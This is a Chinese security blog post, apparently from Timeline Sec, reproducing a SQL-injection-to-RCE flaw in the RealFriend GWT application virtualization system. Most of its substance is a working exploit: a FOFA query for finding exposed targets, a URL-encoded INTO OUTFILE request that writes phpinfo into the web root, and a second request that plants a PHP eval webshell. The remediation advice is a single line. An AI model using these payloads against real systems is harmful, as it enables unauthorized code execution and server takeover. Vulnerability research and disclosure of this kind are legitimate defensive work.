关注我们❤️,添加星标🌟,一起学安全!
作者:lyc@Timeline Sec
本文字数:868
阅读时长:1~3min
声明:仅供学习参考使用,请勿用作违法用途,否则后果自负
0x01 简介
瑞友天翼应用虚拟化系统是一种用于管理和部署企业应用程序的解决方案,旨在提高效率、降低成本和增强安全性。它可以将应用程序从硬件中解耦,提高灵活性,并提供集中式管理和高可用性
0x02 漏洞概述
该漏洞是因为未授权接口在接收参数时没有进行处理校验,存在SQL注入,通过SQL注入写入后门文件进行代码执行。
0x03 影响版本
5.x <= 瑞友天翼应用虚拟化系统(GWT System) <= 7.0.2
访问系统web页面路径/CASMain.XGI?cmd=About
,点击关于即可查看瑞友天翼应用虚拟化系统的版本
0x04 环境搭建
非开源系统
fofa语句:
title="瑞友天翼-应用虚拟化系统"
0x05 漏洞复现
访问瑞友天翼应用虚拟化系统
POC:
GET /AgentBoard.XGI?user=-1%27+union+select+1%2C%27%3C%3Fphp+phpinfo%28%29%3B%3F%3E%27+into+outfile+%22C%3A%5C%5CProgram%5C+Files%5C+%5C%28x86%5C%29%5C%5CRealFriend%5C%5CRap%5C+Server%5C%5CWebRoot%5C%5Clo.php%22+--+-&cmd=UserLogin HTTP/1.1
我们通过解密查看payload内容 解密地址: https://icyberchef.com/
0x3c3f70687020706870696e666f28293b3f3e
数据包如下:
GET /AgentBoard.XGI?user=-1%27+union+select+1%2C%27%3C%3Fphp+phpinfo%28%29%3B%3F%3E%27+into+outfile+%22C%3A%5C%5CProgram%5C+Files%5C+%5C%28x86%5C%29%5C%5CRealFriend%5C%5CRap%5C+Server%5C%5CWebRoot%5C%5Clo.php%22+--+-&cmd=UserLogin HTTP/1.1
发送回显200
成功写入phpinfo,并且执行代码
同样方式可写入webshell
GET /AgentBoard.XGI?user=-1%27+union+select+1%2C%27%3c%3fphp+eval%28%24%5fPOST%5b%22cmd%22%5d%29%3b%3f%3e%27+into+outfile+%22C%3A%5C%5CProgram%5C+Files%5C+%5C%28x86%5C%29%5C%5CRealFriend%5C%5CRap%5C+Server%5C%5CWebRoot%5C%5Cloc.php%22+--+-&cmd=UserLogin HTTP/1.1
成功连接截图
0x06 修复方式
官方已发布安全更新,受影响用户系统尽快更新至安全版本。
参考链接
https://blog.csdn.net/qq_41904294/article/details/130231497
推荐服务
历史漏洞
无
后台功能
回复【1】领取新人学习资料
回复【2】进入漏洞查询功能
回复【3】获取加群方式
回复【4】领取安全电子书籍
回复【5】进入SRC-QQ交流群
商务合作
原文始发于微信公众号(Timeline Sec):瑞友天翼应用虚拟化系统RCE漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论